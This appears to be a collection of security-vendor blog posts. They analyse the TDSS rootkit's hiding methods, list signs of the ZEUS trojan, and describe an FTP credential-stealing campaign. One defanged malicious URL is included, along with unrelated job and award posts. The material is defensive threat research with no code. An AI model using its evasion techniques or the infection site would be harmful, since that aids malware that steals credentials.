Rootkit and Antirootkit developments have always been a cat-and-mouse game and it has become more widespread since rootkits have started being the right friend for trojans, backdoors and other nasty infections used to steal user credentials or to get access to infected PCs.

While writing trojans or backdoors is not bringing any new technique - all new samples we analyze are often just using old and known tricks - rootkit development is the real field where malware writers could show their skills, their potential, their fantasy.

While at the beginning writing rootkits was more a pure exercise and a way to show how the system could be easily compromised, now they are strongly playing along with trojans and backdoors to help them subverting user's systems.

Malware writers are now sending a "catch me, if you can" message to antivirus companies in a hide-and-seek game where rootkit techniques are always a step ahead to security countermeasures and they open wide the road to every other malware which don't mind using even old and known tricks - they are just invisible to everyone, they are free to do as they please. Key word is money.

Tdss rootkit 3rd variant is the last member of Tdss rootkit family that is quickly spreading around the world. While a number of rootkits are just developed as a proof of concept, this is not the case. Tdss rootkit is well known to antivirus companies because of its goal to get total control of the infected PCs and using them as zombies for its botnet.

During these years it has always shown a team of skilled people behind it, who always applied advanced techniques often able to bypass antirootkit softwares. Actually, this last variant could be easily named as the stealthiest rootkit in the wild.

This infection is bringing all together the best of MBR rootkit, the best of Rustock.C and the experience of old Tdss variants. Result is an infection that is quickly spreading on the net and it is undetected by almost every security software and 3rd party anti rootkit software.

The infection comes from the usual dropper spread by peer to peer networks or by crack and keygen websites, and it needs administrator privileges to run its payload. If UAC is disabled or the user voluntarily gives admin permissions, this infection can run even on Windows Vista and Windows 7. This is likely to be the usual scenario, where a user looks for specific cracks and don't mind if UAC warnings him, he gives admin privileges to the wanted crack.

When run, the infection is using a similar technique applied by MBR rootkit: all kernel mode and user mode components are stored to the last sectors of the hard drive, outside the file system. By doing so, they appear to be only raw bytes, bypassing every security check. Tdss rootkit bring this trick to a more advanced level, by encoding its components before they are written to the disk. Files are encoded and decoded on the fly.

Then, to be loaded at Windows startup, Tdss rootkit uses a technique we have seen applied by Rustock.C rootkit - and other rootkits like Neprodoor: infecting Windows system drivers. Tdss rootkit walks back the chain of drivers that handle hard drive I/O looking for last miniport driver object. When found, it infects driver's PE file by overwriting 824 bytes of the resource section. By doing so, it evades a simple check that some antirootkits usually use to detect hidden rootkits: file size cross check. Usually rootkits that infect files can hide their presence by showing the original file instead of the infected one. Antirootkits which are using raw disk reading techniques could read below the filter applied by these kind of rootkits and could cross check file sizes looking for discrepances.

This time is different, because of two evident reasons: currently no antirootkit is able to bypass disk filtering technique used by Tdss rootkit but, even if it was possible, this rootkit could not be detected by file size cross check because file size of the original and infected files are exactly the same.

When the infected driver runs, it executes the 824 bytes loader which then runs the kernel mode component of the infection. It creates a fake driver object, its relative device object, and hijacks every disk I/O communication at the level of drivers's chain where the infected driver was located (i.e. infected driver could be atapi.sys, or iastor.sys).

The rootkit intecepts every communication and filters out IRP_MJ_SCSI packets that have specific SRB flags set. By doing so, it hides patched driver on the disk and all disk sectors where its components are located. This is a really effective technique of disk hiding.

Tdss rootkit then sets up a Load Image notify routine to intercept every process that loads kernel32.dll library. When intercepted, it injects inside the specified process its user mode components of the infection, tdlwsp.dll, tdlcmd.dll. They are able to turn infected PC in a botnet's zombie. Config.ini, one of the components of the infection, contains settings of the botnet, commands to be executed, bot ID and C&C servers addresses. Communication with C&C servers is SSL encrypted, to evade HTTP filters.

Tdss rootkit is indeed a really worrying infection, it is in the wild and it's quickly spreading without being intercepted and detected by almost anyone. Some antiviruses may throw up a warning about the presence of tdlcmd.dll or tdlwsp.dll, without being able to do anything. Most of times users won't be warned at all, they just don't know their PC is part of a botnet and it is under the control of malware writers which can use their PC as they please.

We heartily recommend to not download and use cracks or keygens, they are often vector for very nasty infections.

Despite the complexity of the infection we are able to detect and clean the infection and we will update Prevx with appropriate detection and cleanup routines. In the meanwhile, every Prevx customer who has been affected by this infection can contact our technical support who will remove the infection by remote assistance.

I had the pleasure last night of seeing Jacques receive one of the most notable accolades in the IT industry when he was awarded the British Computer Society title of Young IT Professional Of The Year. It was the first time I have ever seen Jacques geniunely nervous and anxious as the list of finalists was read out. Having witnessed first hand Jacques' achievements I know how well deserving he is of the award.

Here's the link to the BCS announcement.

ZEUS has been around in various generations for a few years now. Here is link to an article from 2007 when a ZEUS Trojan infiltrated several prominent us organizations ZEUS infects US organizations.

ZEUS is easily and commonly dropped by an exploit and is also carried via social engineering techniques exploiting job sites and the like. The ZEUS Trojan, or the ZEUS Banking Trojan can also be referred to by security firms as WSNPOEM and Gorhax.

Outwardly, a ZEUS infected PC will show no obvious signs of infection. The ZEUS Banking Trojan is capable of rifling your Internet cache for stored login and password credentials, it can also eavesdrop on keystrokes and screen contents and can even modify a web page with form injection to capture additional fields - just in case what the criminals want to steal isn't already on the page.

As a recent hyped article claimed ZEUS frequently bypasses popular antivirus and internet security suites. The criminals are careful to infect just a few PCs with each copy of the Trojan, thereby avoiding detection by honepots/nets and subsequent researcher attention in security labs. By the time each copy of a ZEUS Trojan is identified by security researchers it's job is done and a new fresh version will be dispatched to takeover its role.

No one has an accurate account of the real numbers of ZEUS infections, but it must run to millions of PCs worldwide. We uncovered a cache of stolen information captured by a ZEUS Trojan earlier this year. This data came from 160,000 PCs infected by ZEUS Trojans. During the six weeks of tracking this crop of infections it reached a peak of 20,000 new PC infections per day.

Now for some tell tale signs of ZEUS. Using this information you will be able to check your PC for signs of infection by ZEUS. You may also use this information to help you remove the ZEUS Trojan, or at least disable it.

The ZEUS Trojan will commonly use names like NTOS.EXE, LD08.EXE, LD12.EXE, PP06.EXE, PP08.EXE, SRA64.EXE, LDnn.EXE and PPnn.EXE etc, so search your PCs for files with names like this. The ZEUS Trojan will typically be between 40KBytes and 150Kbytes in size.

Also look for a folder with the name WSNPOEM, this is also a common sign of infection for the ZEUS Trojan.

Finally, check the Registry looking for RUN keys referencing any of these names.

Do not assume because your antivirus or internet security suite does not show any signs of infection that your PC does not have the ZEUS Trojan infection.

Thought I'd get this out via the blog to get maximum attention. Prevx is looking to hire a Mac OSX developer to develop a cloud AV client. Should have experience in C/C++ for system level development as well as being able to develop GUI's. If this sounds of interest to you drop a mail to weblog@prevx.com.

As you might know if you have been following our blog, last month we blogged about a FTP password stealer that’s spreading in the wild here.

This infector managed to steal many credentials of many large companies, a total of nearly 90,000 logins were found. We worked with local and international law enforcement to get that site shut down and inform as many victims as we could.

Yesterday while roaming the dark depths of the web, Mike "Rambo" Johnson, one of our malware hunting rockstars, managed to find the latest incarnation of this threat.

On this occasion there is not much difference, it’s an entirely new list of domains containing yet again, a bunch of new "big names" which we are in the process of notifying. Overnight the number of stolen credentials went from 624 to 4338.

The infection begins when visiting what appears to be a harmless website hxxp://-lena-kolesnikova.com/ (NSFW!)

Two separate scripts are all this particular url has to offer, there is no legitimate material to be found, unfortunately.

Most of these sites that have been injected, contain what’s called a rotator, where it rotates malware packs purchased by people who want their malware spread.

When we say "Injected" what we mean is that the ftp credentials has been stolen, and an iframe/script has been injected into the html pages of the site

Script 1 failed to execute on this machine as the IP was blocked due to previous visits throughout that day.

Script 2 is where the FtpBot is launched from, this particular Url is also a rotator and will serve up different malware based on geographic, software installed and time of day.

The exploit kit used by this malware is called FSPACK, there are so many of these around these days that the name really has little value.

So let’s move on to the meaty stuff, on successful exploitation, this is what you could expect to see traffic wise on your machine.

This shows how the pack itself fetch's even more malware on top of the already dropped pieces.

Now, it begins checking for commands....

It tries to connect to a admin panel, however it appears that it’s not configured properly by the malware owners, and doesn't seem to be functioning in terms of statistics gathering.

What happens after this process is complete is that the malware installed on victim machine will harvest ftp details, from known ftp clients, (Total commander, CuteFTP, FlashFXP and a few others) that uploads to a list on the server.

The stolen details get sent to a txt file on the server known as list.txt, and the format of the details are "ftp://username:password@ftp.domain.com".

This then gets dished out to infected clients, who then login to the ftp site and inject an iframe/script into the webpage, the goal of this is to then infect more users who visit these sites using the same exploit pack as shown above.

This is usually where we would finish the blog, pat ourselves on the back and think job done, however we managed to find the site that the people who are responsible for these infections are using to monetize it.

In my opinion the way to protect against FTP login stealers like these are as follows:

- Don't use FTP for anything important, use encrypted protocols

- Don't rely on software such as Total Command, FlashFXP, CuteFTP et al to protect your credentials, the methods used to store the passwords are weak

Prevx 3.0 and Prevx 3.0 Enterprise edition both protect against these threats.

Below is some screenshots, comments and translations from Russian to English.

I think the pictures speak for themselves, however badly they are translated. One thing I can say is that their website isn’t very pretty, but I guess they are getting enough customers with even an ugly looking site!